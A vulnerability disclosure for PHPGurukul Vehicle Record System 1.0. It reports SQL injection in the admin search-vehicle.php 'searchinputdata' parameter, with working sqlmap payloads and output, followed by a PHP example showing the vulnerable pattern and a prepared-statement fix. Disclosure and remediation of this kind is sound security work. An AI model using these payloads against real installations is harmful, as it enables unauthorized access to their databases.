| Field | Value |
|---|---|
| Title | PHPGurukul Vehicle Record System Project V1.0 SQL Injection |
| User | Delvy (UID 74555) |
| Submission | 10/21/2024 05:50 (2 years ago) |
| Moderation | 10/24/2024 08:08 (3 days later) |
| Status | Accepted |
| VulDB entry | 281675 [PHPGurukul Vehicle Record System 1.0 search-vehicle.php searchinputdata sql injection] |
| Points | 17 |

Description

I would like to report a SQL injection vulnerability I discovered in phpgurukul - Vehicle Record System Project during my testing.

Details:

- Affected URL/Endpoint: /vehiclerecordsystem/admin/search-vehicle.php
- Vulnerable Parameter: 'searchinputdata'
- Risk Level: High (allows malicious users to execute arbitrary SQL queries)

Steps to reproduce:

1. Navigate to Search below and input a reference number, for example: 'Toyota'
2. Use a proxy like Burp Suite to intercept the request.
3. Input the payload to invoke the SQL injection.

```
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: searchinputdata (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
    Payload: searchinputdata=Toyota' AND 9682=(SELECT (CASE WHEN (9682=9682) THEN 9682 ELSE (SELECT 4515 UNION SELECT 4759) END))-- -&Submit=Submit

    Type: stacked queries
    Title: MySQL >= 5.0.12 stacked queries (comment)
    Payload: searchinputdata=Toyota';SELECT SLEEP(5)#&Submit=Submit

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: searchinputdata=Toyota' AND (SELECT 1666 FROM (SELECT(SLEEP(5)))emnV)-- IHIs&Submit=Submit

    Type: UNION query
    Title: Generic UNION query (NULL) - 15 columns
    Payload: searchinputdata=Toyota' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x7178787171,0x76436f6e5676554f61466d68685870657577464f49704d45456f43534d756a565166494b7a72526f,0x716b707071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -&Submit=Submit
---
[11:48:46] [INFO] testing MySQL
[11:48:46] [WARNING] reflective value(s) found and filtering out
[11:48:46] [INFO] confirming MySQL
[11:48:46] [INFO] the back-end DBMS is MySQL
[11:48:46] [INFO] fetching banner
web application technology: PHP 8.2.18, Apache 2.4.59
back-end DBMS: MySQL >= 8.0.0
banner: '8.3.0'
[11:48:46] [INFO] fetching current user
current user: 'root@localhost'
[11:48:46] [INFO] fetching current database
current database: 'vrsdb'
```

Please let me know if you need further information or a more detailed analysis.
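The root cause of a finding like the one reported above is a search term spliced into the SQL string. The following is an added example, not PHPGurukul's code: it shows that pattern beside a mysqli prepared-statement version. The table and column names (`tblvehicle`, `VehicleName`) are assumed, since the real schema is not on this page; only the POST field name `searchinputdata` comes from the report.

```php
<?php
// Added example, not the project's own code. Table/column names are
// hypothetical; $con is an open mysqli connection supplied by the caller.

// Vulnerable pattern: the user-supplied term becomes part of the SQL text,
// so a single quote in the term changes the structure of the query.
function searchVehiclesUnsafe(mysqli $con, string $term)
{
    $sql = "SELECT * FROM tblvehicle WHERE VehicleName LIKE '%" . $term . "%'";
    return mysqli_query($con, $sql);
}

// Hardened pattern: the SQL text is fixed and the term travels as a bound
// parameter, so it can never be parsed as SQL.
function searchVehiclesSafe(mysqli $con, string $term): array
{
    $stmt = $con->prepare("SELECT * FROM tblvehicle WHERE VehicleName LIKE ?");
    if ($stmt === false) {
        throw new RuntimeException('prepare failed: ' . $con->error);
    }
    // Escape LIKE metacharacters so '%' and '_' typed by the user match literally.
    $pattern = '%' . addcslashes($term, '%_\\') . '%';
    $stmt->bind_param('s', $pattern);
    $stmt->execute();
    $rows = $stmt->get_result()->fetch_all(MYSQLI_ASSOC);
    $stmt->close();
    return $rows;
}

// Usage in the search handler (field name as named in the report):
// $term = $_POST['searchinputdata'] ?? '';
// $rows = searchVehiclesSafe($con, $term);
```

Replacing every string-built query in the affected script with the bound-parameter form removes the injection point regardless of which of the four sqlmap techniques is attempted.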